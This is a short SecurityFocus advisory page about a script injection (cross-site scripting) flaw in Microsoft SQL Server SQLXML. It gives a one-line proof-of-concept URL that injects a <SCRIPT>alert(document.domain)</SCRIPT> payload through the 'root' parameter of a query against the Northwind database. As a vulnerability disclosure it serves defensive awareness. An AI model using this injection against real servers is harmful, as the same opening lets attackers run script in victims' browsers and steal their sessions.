Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Microsoft SQL Server SQLXML Script Injection Vulnerability

The following proof of concept was provided by Matt Moore <matt@westpoint.ltd.uk>:

IIS-server/Northwind?sql=SELECT+contactname,+phone+FROM+Customers+FOR+XML&root=
<SCRIPT>alert(document.domain)</SCRIPT>







 

Privacy Statement
Copyright 2008, SecurityFocus